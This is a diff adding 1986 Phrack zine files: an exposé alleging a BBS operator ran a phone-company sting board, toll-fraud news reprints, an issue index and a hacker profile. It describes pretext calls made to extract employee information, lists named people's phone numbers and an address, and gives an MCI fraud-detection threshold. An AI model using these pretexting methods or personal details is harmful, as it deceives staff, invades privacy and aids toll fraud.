+in that this is the first that I have heard about it.  I meant to say that it
+has been deployed on some networks already.  If you have any valid information
+on the 1PSS SWITCH please post it and it will show up in the P.H.I.R.M. update
+issue for July, giving you credit for the information of course.
+
+BLADE RUNNER (PRESIDENT)
+P.H.I.R.M.
+-------------------------------------------------------------------------------
+
+Msg#: 8456 *COMMUNICATIONS*
+07/13/86 13:48:51 (Read 75 Times)
+From: SCAN MAN
+To: SHAWN (Rcvd)
+Subj: REPLY TO MSG# 7691 (GENERAL)
+
+GOT ANY CODES FOR 800-451-2300?
+
+[***IMPORTANT***  This is TMC's Miami, Florida dial-up.  An interesting request
+from the sysop of one of the nation's top code boards.  For those of you who
+remember it was Scan Man who asked the infamous Whacko Cracko Brothers, Inc.
+{See PWN Issue II, "The Life And Crimes of The Whacko Cracko Brothers, Inc."}
+to scan some codes on a certain dial-up just before they were arrested.  Now he
+is asking Shawn for TMC codes, kinda interesting that Shawn got investigated
+less than a week later by TMC Security Department isn't it?]
+-------------------------------------------------------------------------------
+
+Msg#: 8970 *COMMUNICATIONS*
+08/10/86 06:41:48 (Read 34 Times)
+From: SHAWN
+To: SCAN MAN (Rcvd)
+Subj: REPLY TO MSG# 8456 (GENERAL)
+
+Well sorry it took me so long to find this message I kept forgetting to look at
+this one.  Anyway if you really need some [codes, referring to the last
+message] I can dig some up easy enough well hack some I should say noting you
+can get about 100 in a matter a 10 or 15 minutes so its no big deal to me
+either way also watch 800 637 7377 I'm telling you now people that this company
+has tracing stuff and I have talked with them they offer me a job and I'm goin
+to take it but dont worry I'm not goin to be busting people I have to make it
+so you guys cant get in notin it is very easy to make it at least very hard to
+do ho well be careful.
+
+[Be careful indeed! 800-637-7377 is TMC's Las Vegas dial-up.  What would you do
+if you were about to lose your computer and maybe your freedom?  Work for the
+other side?  The kid really has a way with words, I haven't seen spelling and
+grammer like that since first grade.  As for his not busting people, isn't that
+a laugh, he has already stated that he will bust anyone he can starting with
+the lower level phreaks who are only into code abuse.]
+-------------------------------------------------------------------------------
+
+Msg#: 8974 *COMMUNICATIONS*
+08/10/86 13:14:13 (Read 34 Times)
+From: JOHNNY ROTTEN
+To: ALL
+Subj: PHREAKERS QUEST
+
+To all users of Phreaker's Quest...
+
+What happened to it? It just rings. If you have any info. Leave mail or
+whatever.
+          <Johnny Rotten>
+-------------------------------------------------------------------------------
+
+Msg#: 9058 *COMMUNICATIONS*
+08/13/86 06:58:12 (Read 30 Times)
+From: SHAWN
+To: JOHNNY ROTTEN
+Subj: REPLY TO MSG# 8974 (PHREAKERS QUEST)
+
+Well you see I came very close to getting busted they called my voice line that
+is TMC of 800 637 7377 and I have never given it out to anyone at all [I bet!]
+so I knew that i was in for it they told me they knew I ran a board and they
+said they could not get in I kept deleted them haha anyways I had 2 choices 1
+take it down 2 get busted.
+
+[Wonder how they got your home number Shawn?  Did you give it out for
+validation on Pirate-80?  Maybe around the time of the "Bi-annual userlog
+cleanup"?  Or, could it be the cops are smart enough to ask the phone company
+for any other line running into a house where a suspect BBS is running?]
+-------------------------------------------------------------------------------
+
+Msg#: 9052 *COMMUNICATIONS*
+08/12/86 19:10:47 (Read 29 Times)
+From: JIM RATH
+To: ALL
+Subj: TMC
+
+Listen people... it is time to stop screwing with TMC.. (7377 number).  Our
+good friend Shawn of Phreakers Quest just had his BBS put down from them.
+Shawn met some guy from TMC, and they have had ANI on the number for months
+now.  If you value your own security, throw away any and all TMC information
+NOW, or you might be suffering the consequences later.
+
+For details on the "Bust" call Theives Underground II.  It's SCARY!
+
+-------------------------------------------------------------------------------
+
+Msg#: 9054 *COMMUNICATIONS*
+08/12/86 23:50:02 (Read 28 Times)
+From: SCAN MAN
+To: JIM RATH (Rcvd)
+Subj: REPLY TO MSG# 9052 (TMC)
+
+          Where is Thieves Underground located?
+
+[Why is Scan Man so interested in what Shawn is saying about his experience
+with TMC?  I mean plenty of people on Pirate-80 have run-ins with some form of
+security everyday and he doesn't go researching them, why is this "TMC Run-IN"
+so important to him?   Maybe he has a personal reason to be interested, then
+again maybe not.]
+-------------------------------------------------------------------------------
+Msg#: 9086 *COMMUNICATIONS*
+08/14/86 13:36:37 (Read 25 Times)
+From: JIM RATH
+To: SCAN MAN (Rcvd)
+Subj: REPLY TO MSG# 9054 (TMC)
+
+I believe TU is in Texas somewhere.. dunno where exactly (never really bothered
+remembering).. 214 AC though
+-------------------------------------------------------------------------------
+
+Msg#: 9110 *COMMUNICATIONS*
+08/15/86 03:54:20 (Read 16 Times)
+From: SHAWN
+To: JIM RATH (Rcvd)
+Subj: REPLY TO MSG# 9052 (TMC)
+
+If you want some details why dont you just ask me seeing as though i would be
+the one to ask the TU only knows what i tell him and scan man i need to talk
+with you about this they did have an idea of some things going on here and so
+one i would rather say it to yo then type it in
+
+shawn
+
+-------------------------------------------------------------------------------
+Indeed, what is going on here Shawn?  Just what did TMC mention about
+Pirate-80?  And why not post it in on the public boards?  For the answer to
+that maybe one could talk to Jeff Namey who works for TMC and is very proud to
+acclaim the efforts of one Scott Higgonbotham and his sting BBS Pirate 80 which
+has, in his own words, "Saved my company from near bankruptcy at the hands of
+the hackers."
+
+It is also interesting to note that Scan Man recently admitted to being a
+computer security consultant in Phrack Pro-Phile IV.  He said his boss didn't
+know about his outside phreak/hack interests.
+
+Scan Man also claims to have infiltrated various security organizations.  I
+wonder if he has infiltrated or simply joined as a regular member.
+
+-------------------------------------------------------------------------------
+The following are highlights of a conversation with Ben Graves of TMC, around
+August 25th or 26th (SR=Sally Ride   BG=Ben Graves):
+
+SR:  Mr. Graves I need to talk to you about one of your employee's a Scott
+     Higgonbotham (Scan Man).
+
+BG:  What about Scott?
+
+SR:  Well, my company is concerned with the impact of computer hackers on our
+     business.  Scott attended a convention in Miami around January and gave
+     his business card to one of our security people.  I'm following up on
+     their conversation with the idea that perhaps my company could be given
+     access to Scott's electronic bulletin board.  In this way we could monitor
+     for hackers abusing our codes.
+
+BG:  That may be something we can arrange.  I know that Scott has been a great
+     help to TMC since we were able to pick him up.  We began to have a big
+     problem with hackers awhile back and Scott seems to have some of the
+     answers.  He's not in right now, can I have your number and I'll have him
+     call you back?
+
+SR:  You sure can.  So, Scott's bulletin board has helped you reduce your
+     losses to toll fraud?
+
+BG:  Well,  that's just one of the ways Scott has used to work on the problem.
+     But, he has been very effective.
+
+SR:  Thanks, Ben, I'll be waiting for the call.
+-------------------------------------------------------------------------------
+The following are highlights of conversation with Pauline Frazier of TMC from
+around September 5, 1986   (Sally Ride: SR   Pauline Frazier: PF)
+
+Operator:  TMC, may I help you?
+
+SR:  Yes, Ben Graves, please.
+
+Operator:  I'm sorry, Mr. Graves is no longer employed here.
+
+SR:  Oh!? Well, is Scott Higgonbotham in?
+
+Operator:  One moment, please.
+
+PF:  Hello, this is Pauline Frazier, I'm the office manager, may I help you?
+
+SR:  Well, maybe, I was trying to reach Ben Graves, I just talked to him last
+     week about another one of your employees, Scott Higgonbotham, now the
+     receptionist says Ben no longer works here.
+
+PF:  Yes, that is true, and neither does Mr. Higgonbotham.
+
+SR:  May I ask why?
+
+PF:  I'm really not able to say much, I think you should talk to our
+     Regional Security Director,  Kevin Griffo, he's on 804-625-1110.  He could
+     tell you much more than I can.
+
+SR:  O.K., but maybe I should tell you why I'm interested.  I  was talking to
+     Ben about an electronic bulletin board Scott is running.  My company has
+     someone on it and we're concerned that things might not be legal on there.
+     There are access codes being posted of my company's and yours'.  Could
+     that be why they're no longer employed?
+
+PF:  Do you mean he is posting TMC codes on there?
+
+SR:  Well, I can't say he's the one posting the codes, but he is letting them
+     be posted, along with a lot of other information such as computer logins
+     and passwords.
+
+PF:  Well, you know I never did like it when they hired that fellow.  And,
+     I told them so, too.  When he started we had a problem with toll fraud,
+     but nothing like it is now.   He was able to catch a few of those hackers
+     while he was here, and we pressed charges, but the problem just seemed to
+     get worse and worse.
+
+SR:  So, he actually had some hackers arrested?
+
+PF:  Yes, several.  He started working here in Charleston and then they
+     sent him to New York when things got bad up there.   But, things never
+     have gotten any better since he's started here or in New York either.
+     Sir, please, call Mr. Griffo about all this he can tell you more than I.
+
+SR:  I will.  Do you think he'd be in now?
+
+PF:  Well, it's late here and he's probably gone home, try Monday.
+
+SR:  Thanks, I will.
+
+     (But you told me plenty, sweetheart!)
+
+[For the record I had a VERY similar chat with Pauline Frazier, it turned up
+the same results.]
+-------------------------------------------------------------------------------
+The following are highlights of a conversation with Kevin Griffo, TMC,
+September 9th (Sally Ride:  SR  Kevin Griffo: KG).
+
+Oper:  TMC, may I help you?
+
+SR:  Yes, Kevin Griffo, please.
+
+Oper:  His line is busy now, can he call you back?
+
+SR:  Well, this is urgent, may I hold?
+
+Oper:  Certainly, I'll let him know you're holding.
+
+KG:  Hello, this is Kevin.
+
+SR:  Mr.  Griffo I've been referred to you by one of your Charleston employees,
+     Pauline Frazier.  She felt I should tell you what I told her yesterday
+     about one of your now former employees, I think, Scott Higgonbotham.
+
+KG:  Yeah, we let him go just last week.  What about him?
+
+SR:  My company feels Scott is running an illegal BBS and has for sometime been
+     allowing access codes to be posted.  Codes for your company's toll
+     switches as well as ours and other's are being entered on his system as
+     well as computer system logins and passwords.
+
+KG:  Well, I'm not surprised.  I have been to Scott's home to see the bulletin
+     board.  I knew codes were being posted, but I thought he was taking care
+     of reporting them.
+
+SR:  May I ask why you let him go?
+
+KG:  Certainly, Scott just wasn't solving our problems.  In fact, some of our
+     people have thought he was somewhat to blame for many of them.   Even
+     though, at first, he appeared to be the answer.  He was able to identify
+     several computer hackers for us.
+
+SR:  So, he did bust some hackers?  Has he done so recently?  I think a young
+     man using the name Shawn on the bulletin boards was recently identified by
+     your company.
+
+KG:  No, he hasn't gotten anyone recently that I'm aware of, but he could have
+     turned them over to one of the local franchises.  You see TMC is a
+     franchise operation.   We try to help the franchises, but many do their
+     own thing.  We wouldn't necessarily know about all that goes on.
+
+SR:  I'm sorry to hear you had this trouble.  Perhaps, my company could
+     be of assistance.  We do work of a similar nature.
+
+KG:  I'd certainly be interested in any help you could give.  Can you put
+     together a written proposal?
+-------------------------------------------------------------------------------
+I also had an interesting conversation with Larry Algard of Pacific Northwest
+Bell.  He confirmed that he had met Scott Higgonbotham at the Miami CFCA
+conference last January.  He also mentioned that Scott had told him about his
+"sting" bulletin board, Pirate-80 in West Virginia.
+
+For those who are interested:
+
+TMC (Charleston Office).......................304-345-7275
+Pauline Frazier, Office Manager (TMC).........See above
+Jeff Namey, Accounts Receivable (TMC).........304-744-6555
+TMC (Miami Office)............................305-371-3544
+TMC (Tidewater)...............................804-625-1110
+Larry Algard (Pacific North West Bell)........503-242-8862
+Pacific North West Bell (Employee Directory)..800-426-7039
+
+Or write to;   TMC
+               405 Capitol St.
+               Parlor Suite
+               Charleston, West Virginia 25301
+
+All the thoughts in []'s and other information are the insane ramblings of
+Sally Ride:::Space Cadet and Knight Lightning, you tell me, are we spaced out
+or what?!   The TMC employee interviews were by Sally Ride:::Space Cadet with
+me doing the background information.
+
+It was at this point in time that we decided to have a talk with Scan Man
+directly and give him a chance to clear his name and reputation.
+
+Unfortunately, Scan Man was very uncooperative and constantly avoided answering
+the questions I asked him.  He also added that everything said in the
+interviews were lies.  He claims that Kevin Griffo has never been to his house,
+he doesn't know Ben Graves, and Pauline Frazier hated him because she knew he
+was a hacker.
+
+He then went on to imply that Sally Ride:::Space Cadet was actually an employee
+of some communications carrier himself because of the terminology he used in
+some of his posts on P-80.
+
+Scan Man claimed that he has been telling people that he worked for TMC for
+quite some time and he only needed the codes from Shawn because he was going to
+be in Miami later that week.  In other words, Shawn's near bust and his asking
+for TMC codes may have been a simple coincidence.
+
+He claims to have done system analysis for TMC, but also admitted to securing
+some of their computer systems, which isn't a crime.
+
+As for his being at the Miami CFCA conference, I will assume that he was
+infiltrating the con and was spotted as being a hacker.  In order to gain the
+respect and confidence of the security officials, he told them that his
+bulletin board was a sting.   Now, that story completely is believable with the
+exception of how he arrived, a plane trip paid for by TMC.
+
+Scan Man's last words contained a threat that if this affected his home life,
+he would personally track down the writers and contributors and shoot them with
+his rifle.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Notes from KL:
+
+One thing that I should mention is the fact that Pirate-80 has *NEVER* been
+busted or investigated.  I mean its not hard to get onto and there are codes
+plastered everywhere you look.  How many boards do you know of that have been
+busted for having codes on them?  One example of this is with the credit card
+numbers owned by Richard Sandza, author of "The Night Of The Hackers" and "The
+Revenge Of The Hackers," both printed in Newsweek Magazine.
+
+"It wasn't long before I found out what was being done with my credit-card
+ numbers, thanks to another friendly hacker who tipped me to Pirate 80, a
+ bulletin board in Charleston, W. Va., where I found this:  'I'm sure you guys
+ have heard about Richard Standza [sic] or Montana Wildhack.  He's the guy who
+ wrote the obscene story about phreaking in NewsWeek [sic].  Well, my friend
+ did a credit card check on TRW...try this number, it's a VISA...Please nail
+ this guy bad...Captain Quieg [sic].'"
+
+See this?  This was published in "The Revenge Of The Hackers" in Newsweek
+Magazine!  And what happened to P-80?  Nothing!  Here Richard Sandza has just
+announced to thousands of people that P-80 has credit card numbers posted on it
+and nothing happened.  Why?  The answer to that is left to the reader.
+
+There are a few other things to mention about Scan Man/P-80/TMC.  Supposedly
+all of the computer equipment that P-80 runs on was donated by TMC themselves.
+It is also believed that Scan Man's only duty to the company was to report TMC
+codes so that they could be turned off.  It would appear that this had changed
+but, we at Phrack Inc. in no way take any opinion whatsoever about the
+innocence or guilt of Scan Man.  We leave it to the reader to decide for
+him/herself.
+
+I'm sure all parties concerned would appreciate you NOT calling the above
+numbers if all you plan to do is harass people or anything else among those
+same lines.  After all a job is a job and harassing someone wouldn't do
+anyone any good either, it would just make them mad.  If you are going to call,
+make sure it is for knowledge purposes only!  Above all do NOT call Scan Man to
+harass him or his innocent family.  My suggestion is that if you feel that Scan
+Man is an informant or whatever, then stop just calling his board.
+
+One last thing, a *VERY* big thank you to Sally Ride:::Space Cadet for a job
+well done and for all the time he spent working on the article.
+
+                            Information Provided by
+
+                  Knight Lightning & Sally Ride:::Space Cadet
+
+                          and directly/indirectly by
+
+     Blade Runner/Evil Jay/Forest Ranger/Icarus 1/Jack The Ripper/Jim Rath
+Johnny Rotten/Larry Algard/Max Madness/Oryan QUEST/P-80 Systems/Scan Man/Shawn
+              Suicidal Nightmare/Taran King/The Falcon/TMC Staff
+
+                          and other Anonymous Sources
+
+-------------------------------------------------------------------------------
+PS: For those interested, this investigation was sparked by the interception of
+    a memo from Larry Algard (Pacific Northwest Bell) to his boss, George Reay.
+    What was in the memo?  Several things, but mostly it spoke of the January
+    CFCA (Communications Fraud Control Association) conference in Miami,
+    Florida where Larry met one Scott Higgonbotham, Security Director for TMC
+    (Tele-Marketing Company) who told him that he operated a "sting" bulletin
+    board named Pirate 80 in West Virginia.
+_______________________________________________________________________________
+
diff --git a/phrack9/1.txt b/phrack9/1.txt
new file mode 100644
index 0000000..e5fae13
--- /dev/null
+++ b/phrack9/1.txt
@@ -0,0 +1,27 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #1 of 10
+
+                                 Introduction
+                                 """"""""""""
+
+         Welcome, after an ever-too-long gap, to Phrack Inc. Issue Nine!  Yes,
+I've waited too long to do this, but hey, what can I say.  We have it together
+now and the file content is quite good, with some unique new writers as well
+as some old ones popping up again.  Let me once again stress that ANYONE can
+write for Phrack Inc.  You aren't required to be on a particular board, much
+less a board at all, all you need is some means to get the file to us, as we
+do not discriminate against anyone for any reason.  This Phrack issue contains
+the following:
+
+#1  Introduction to Phrack Inc. Issue Nine by Taran King (1.4K)
+#2  Phrack Pro-Phile on The Nightstalker by Taran King (6.4K)
+#3  Fun With the Centagram VMS Network by Oryan Quest (3.9K)
+#4  Programming RSTS/E File2: Editors by Solid State (12.9K)
+#5  Inside Dialog by Ctrl C (8.4K)
+#6  Plant Measurement by The Executioner (12.8K)
+#7  Multi-User Chat Program for DEC-10's by TTY-Man and The Mentor (6.5K)
+#8  Introduction to Videoconferencing by Knight Lightning (10.5K)
+#9  Loop Maintenance Operations System by Phantom Phreaker and Doom Prophet
+    (17.2K)
+#10 Phrack World News VIII by Knight Lightning (16.3K)
diff --git a/phrack9/10.txt b/phrack9/10.txt
new file mode 100644
index 0000000..93bcac5
--- /dev/null
+++ b/phrack9/10.txt
@@ -0,0 +1,311 @@
+                               ==Phrack Inc.==
+
+                   Volume One, Issue Nine, Phile #10 of 10
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+                        {-=*> Phrack World News <*=-}
+                                 *Issue VIII*
+
+                         Created by Knight Lightning
+
+                                  Written by
+                       Knight Lightning and Sally Ride
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Welcome readers to PWN Issue VIII!  The last few months have been pretty slow
+in the area of real news and this issue we feature; Phrack World Reprints.
+That's right, unfortunately most of the information in this issue is from
+outside sources.  I hope you find it equally as interesting and remember...
+
+                            No News Is Good News!
+______________________________________________________________________________
+
+TMC Cracks Down                                                August 26, 1986
+---------------
+Byline article by F. Alan Boyce, Associated Press Writer
+
+Raleigh (AP) -- The use of home computers to pirate long-distance telephone
+access codes and credit card numbers is increasing and may warrant more
+prosecution and tighter security, federal authorities said Tuesday.
+
+U.S. Attorney Sam Currin said five recent indictments for computer fraud
+stemmed from a six-month investigation involving home computers and computer
+bulletin boards in 23 states.  By telephoning some computers, people with the
+proper passwords could get numbers that would let them charge phone calls to
+unsuspecting victims or make purchases with stolen credit cards.
+
+"One bulletin board contained more than 100 stolen telephone access numbers
+and 15 stolen credit card numbers," Curri said.  "With the use of computers
+becoming much more prevalent in our society, we're going to see a lot more of
+this type of activity."
+
+The probe began with Telemarketing Communications (TMC) of Raleigh, where an
+estimated $100,000 was lost to unauthorized calls in six months.
+Investigators were aided by an unidentified 16-year-old high school student
+who had been caught by Telemarketing officials after making $2,000 worth of
+illegal calls, officials said.
+
+"That was a tremendous benefit to us in this investigation," Currin said.
+"High school kids today are computer-smart.  They know what they're doing."
+The juvenile was not charged and has made restitution, Currin said.
+
+U.S. Secret Service Agent William Williamson said the youth provided passwords
+and used his own computer to reach the highest levels of bulletin boards
+operated by those indicted.
+
+A federal grand jury in Greensboro charged three North Carolina men Monday
+with illegally possessing charge-account numbers and telephone long-distance
+access codes obtained through home computers.
+
+Robert Edward Lee II of Durham was charged with devising a method for
+defrauding Telemarketing Communications (TMC).  The grand jury also charged
+Michael William McCann of Dobson with possessing more than 15 unauthorized
+telephone access codes and account numbers owned by Telemarketing
+Communications, TransCall America and General Communication Inc.  Tyrone
+Columbus Bullins of Reidsville was charged with possessing 17 unauthorized
+charge numbers and 15 unauthorized telephone access codes and account numbers.
+
+Ralph Sammie Fig of Knightdale and James Thomas McPhail of Goldsboro were
+indicted on similar charges by a grand jury in the Eastern District Aug. 19.
+
+Currin said each could face up to 10 years in prison and a $250,000 fine if
+convicted under tough laws passed in 1984.
+
+"The potential for fraud in this area is very great," he said.  "We have an
+obligation to prosecute violators.  Companies themselves, if they're going to
+stay in business and remain viable, also have an obligation to promote their
+own internal security systems."
+
+Mike Newkirk of TeleMarketing Communications said it was difficult to protect
+codes without making systems too hard for the average customer to use.
+
+"There are programs that break codes in security systems such as ours as the
+computer operator is even sleeping," he said.  "It can be randomly broken and
+he can wake up the next morning and just check the file."
+
+Newkirk said his company was considering installing equipment that could deny
+telephone access to phones where trouble arises.  But he said other
+alternatives, like having operators answer calls to screen for access codes,
+would be too expensive.
+
+Williamson, however, said one company that changed from computer answering to
+operators reported 5,600 callers hung up when asked for proper codes.
+
+               Information Provided By Sally Ride:::Space Cadet
+______________________________________________________________________________
+
+Here's a news story out of Vancouver, Washington that shows an unusual twist
+on the old cat and mouse game we phreaks play with the feds and phone cops.
+The story should be entitled...
+
+                              FEDS TRASH HACKER
+                              -----------------
+However, it's really headlined.......
+
+Teen Age Suspect In Local Computer Probe                      October 10, 1986
+----------------------------------------
+by Thomas Ryll             The Columbian
+
+A 15-year-old suspected hacker who reportedly used the nickname "Locksmith" is
+the subject of the first local sheriff's office investigation of alleged use
+of a computer for illegal long-distance telephone use.
+
+Clark County deputies seized the teen-ager's computer, related equipment, and
+bags of software Tuesday when they acted on a search warrant naming Tony E.
+Gaylord, 10317 N.W. 16th Ave, a Columbia River High School student.
+
+At one point in the investigation, trash from the Gaylord residence was
+examined for evidence of telephone numbers that had allegedly had been
+misused, according to the warrant.
+
+The warrant, signed by District Court Judge Robert Moilanen, states that
+officials of American Network have discovered illegal long-distance calls that
+have cost the company more than $1,700.  Items to be seized at the residence
+were to be evidence of first-degree theft and second-degree computer trespass.
+
+No formal charges have been filed.  Gaylord who was at school when his
+computer was seized, was not arrested, said Ronee Pillsbury, the sheriff's
+office investigator on the case.  The county prosecutor's office is reviewing
+reports, and "we still have quite a bit of work to do on the case," she said.
+
+American Network is a long-distance telephone service company with offices in
+Vancouver.  Although the firm has prosecuted computer hackers on its own, the
+sheriff's office has never been involved, Pillsbury said.  Despite the fact
+that federal statutes often are involved,  "American Network has not had much
+cooperation from the federal people, who have had a 'don't-come-to-us'
+attitude."
+
+The novelty of the case is further indicated by mention of the computer
+trespass law, a recent state statute that reflects a law enforcement problem
+that has grown with the proliferation of home computers.  With modems and
+other equipment, unscrupulous users, sometimes called "phreakers," have
+tampered with computer records, made unauthorized telephone calls, pilfered
+bank accounts and otherwise misused equipment.
+
+The local case surfaced in October 1985, when an American Network "abuse
+analyst" examined company "switch  reports" that "alerted her to a pattern she
+associated with computer hacking," according to the search warrant affidavit,
+which includes a list of telephone numbers all over the country that allegedly
+were illegally dialed.
+
+Investigation of another hacker led to Gaylord; one day in August, the
+family's garbage was searched by American Network investigators after
+Vancouver Sanitary Service workers bagged it and set it aside.
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Some notes from Sally Ride:::Space Cadet:
+----------------------------------------
+A novel case in many respects!  Not only was evidence collected by the phone
+cops trashing a hacker's garbage, with the cooperation of the garbage company
+but this is the first case involving the local sheriff's department.
+
+I have discovered the reason no charges have yet been filed in the case is
+because of an even more unique twist in this tale.  American Network, commonly
+called Amnet and sister company of Savenet, has joined forces with MCI in the
+prosecution of this case and may bring in our good old friend TMC as well to
+aid in the persecution of Locksmith.
+
+During an interview with April Brown of American Network Security I was
+informed the problems for the Locksmith have only just begun.  The article
+mentions $1,700 worth of calls.  Well, that was when they first swore out the
+warrant.  Amnet now has identified about $4,000 worth of toll and linked it to
+our friend Tony.  But that's not all.  After providing information on the case
+to MCI an amount tripling the Amnet long distance charges has been connected
+with this case.  The Amnet agent had not received an indication from TMC on
+the amount they are bringing to the case.
+
+The question I have is why are these companies joining forces for the first
+time, that I'm aware of, to dump so hard on this one little guy out of this
+remote neck of the woods?  Part of the reason appears to be because Amnet
+approached Tony's parents in late 1985 about their son's activities and were
+rudely turned away, according to April Brown.
+
+The other unusual thing about this story is the quote from Amnet about the
+lack of cooperation received from the federal authorities.  Here I thought the
+feds were hot to trot to nail as many of us as possible.  I guess not as hot
+as Amnet wants them to be.
+
+             Typed and editorialized by Sally Ride:::Space Cadet
+______________________________________________________________________________
+
+Football Phreaking?                                            October 1, 1986
+-------------------
+MIAMI (UPI) -- The University of Miami and MCI reached an agreement Wednesday
+that will keep the long-distance carrier from pressing charges against
+Hurricane football players who made long-distance calls using someone else's
+access card number.
+
+Miami Athletic Director Sam Jankovich met with officials of MCI
+Telecommunications Inc. and said that the matter had been resolved.  The
+company had threatened to press legal action.
+
+An investigation by the Miami athletic department and MCI found up to 34
+players were involved along with an undetermined number of other students.
+The Miami Herald said the bill for the calls could have been as high as
+$28,000.
+
+Many of the calls allegedly were made from New Orleans where the Hurricanes
+played in the Sugar Bowl New Year's Day. "We had a telephone conversation and
+visited with MCI officials and another meeting has been set for Friday to go
+over people who still have a balance," Jankovich said.  "MCI has informed me
+they will not press charges against the student athletes involved.  We have 12
+players who still owe money.  We will sit down with those 12 and develop a
+payment schedule on Friday."
+
+David Berst, director of enforcement for the NCAA in Mission, Kansas, said he
+was unsure if the NCAA would investigate the matter.
+
+Just goes to show, if you get caught, claim to be a dumb jock...
+
+                      Information from +++The Mentor+++
+______________________________________________________________________________
+
+MCI Gets Scammed                                              October 10, 1986
+----------------
+ORLANDO, Fla. (UPI)--Jessica Barnett's phone bill this month was no quick
+read--it ran 400 pages long and totaled $90,152.40.
+
+"Who could pay a $90,000 phone bill?  I'll have to mortgage my house to pay my
+bill," said the 28-year-old housewife, who contacted MCI Telecommunications
+Corp. in Atlanta shortly after opening the 2-inch thick bill.
+
+"I called them and said, 'Hi, I've got this high bill.'  They asked how much,
+and when I told them they laughed.  They said, 'You've got to be kidding.'"
+
+MCI spokeswoman Laurie Tolleson said computer hackers apparently discovered
+the Barnett's personal code and used it to make long-distance calls.
+
+Most of the calls were made to Tennessee, and some lasted nearly two hours,
+Tolleson said.  Others were placed to Georgia, Alabama and Maryland.
+
+"It's like they call continuously 24 hours a day, all day," Barnett said.  "I
+don't see the point in making these calls.  If I was going to do something
+like that,  I'd be exotic and call Europe--not Tennessee or Norcross, Ga."
+
+It was not Barnett's first problem with the phone company--she received a
+$17,000 bill in July.  She thought things were straightened out when she did
+not get a bill last month, but the bill that arrived Monday included $70,000
+in past-due charges.  She said she and her husband, Jim, are not taking the
+mix-up too seriously.  "He kidded that now he knows what I do all day,"
+Barnett said.
+
+"What can you do?  It doesn't bother me as long as I don't have to pay it.   I
+feel bad for MCI.  I think they're getting ripped off."
+
+                      Typed by Sally Ride:::Space Cadet
+______________________________________________________________________________
+
+MCI Introduces VAX Mailgate
+---------------------------
+VAX Mailgate is a software product that combines the strengths of Digital
+Equipment Corp.'s "All-In-1" Integrated Office And Automation System with MCI
+Mail's public electronic mail service for around-the-world business
+communication.
+
+                Information From USA Today-Special MCI Edition
+______________________________________________________________________________
+
+MCI Card Fraud Detection Unit - The Online Security System             11/7/86
+-----------------------------
+The following is a brief description of the new on-line security system for
+the MCI Card.  The system developed in order to provide real-time detection of
+excessive (and therefore potentially fraudulent) card usage.  Rather then
+depending on FREWS reports for their current Early Warning System, they are
+now able to investigate and arrest card abuse as it occurs, rather than
+waiting until damage has been done.
+
+A.  Detection
+
+    In order to detect possible fraud as it occurs, a counting mechanism in
+    the Fraud Detection Unit will be tracking call attempts for every MCI Card
+    authorization code on a continuous basis.  Generic parameters based on
+    number of call attempts in a specified period (currently 15 calls in a 25
+    minute period) are used to identify potential card abuse.  As soon as the
+    threshold is reached for any one code, Security and Investigation will be
+    notified, via PC screen, hardcopy, and audible alarm.
+
+B.  Verification
+
+    Upon notification of a potential problem, Security and Investigations will
+    first pull up the account record to check the Note Screen for anything
+    that may indicate Card abuse (i.e., non-payment, Card lost, stolen, or
+    never received).  They will then try to contact the customer to verify
+    whether the Card is being used legitimately or not.  For problems detected
+    after business hours, the customer will be contacted the following
+    morning.
+
+C.  Deactivation
+
+    If the customer has not been making the calls, or if the account phone
+    number is found to be illegitimate, the code will be deactivated
+    immediately in the Card Authorization Center.  If the customer cannot be
+    reached, Security and Investigations will continue to monitor call volumes
+    on the code and will deactivate the code only if the high volumes continue
+    or reappear.
+
+D.  Reactivation
+
+    Codes deactivated due to fraud can only be reactivated by Security and
+    Investigations.
+______________________________________________________________________________
+
diff --git a/phrack9/2.txt b/phrack9/2.txt
new file mode 100644
index 0000000..90b3c24
--- /dev/null
+++ b/phrack9/2.txt
@@ -0,0 +1,127 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue Nine, Phile #2 of 10
+
+                           ==Phrack Pro-Phile VI==
+
+                      Written and Created by Taran King
+
+                                   9/28/86
+
+         Welcome to Phrack Pro-Phile VI.  Phrack Pro-Phile is created to bring
+info to you, the users, about old or highly important/controversial people.
+This month, I bring to you a particularly influential user from days of old...
+
+                               The Nightstalker
+                               ~~~~~~~~~~~~~~~~
+
+         The Nightstalker was involved with Tap and 8080B, the first home
+computer which he helped build for NY Telephone.
+------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: The Nightstalker
+       Past handles: Stainless Steel Rat, The Old Wazoo, C.T.
+      Handle origin: TV movie and series called "The Nightstalker"
+      Date of Birth: 12/51
+Age at current date: 34 years old
+             Height: 6'+
+             Weight: 200+ lbs.
+          Eye color: Blue-Green
+         Hair Color: Brownish-Black
+          Computers: ALTAIR 8080B, Apple IIe, Commodore 64
+
+------------------------------------------------------------------------------
+         The Nightstalker started in the phreak world in 1971 due to the
+Esquire article on blue boxes and YIPL magazine.  He obtained his first blue
+box by January, 1972.  He started hacking in 1975 after obtaining a TI Silent
+700 Series, Model 700 exceedingly dumb terminal.  He stumbled upon ARPAnet in
+Massachusetts, the bridge at MIT...1 hour later, he figured out how to get
+on.  He toyed with the MIT exchange and found the MULTICS system and their
+artificial intelligence system.  They were just beginning to use a language
+called LISP at the time.  He also helped with the building of the ALTAIR
+8080B, holding 22 slots for cards 4 inches thick, 18 of which were used to get
+16K on the computer.  He helped out NY Telephone with "Let's Get Together", a
+game at fairs which utilized Area Codes for answers.  He also was involved
+with the standard old phone phreak tricks like a loop around the world from
+one phone booth to the one next to it.  His first computer was a Commodore 64
+due to the cost to him (free) and it was easier to upgrade than the Apple IIe
+(pick up a brochure on Commodore and see how many voices it has as well as the
+tone range...I'm sure that it covers 2600 hz quite nicely).
+
+Members of the telecom world which he has met include Cheshire Catalyst,
+Captain Crunch, Steve Wozniak, and Bill Gates (head of Microsoft).  He has met
+many phone phreaks at science fiction conventions, but doesn't know them by
+name or handle.
+
+-------------------------------------------------------------------------------
+
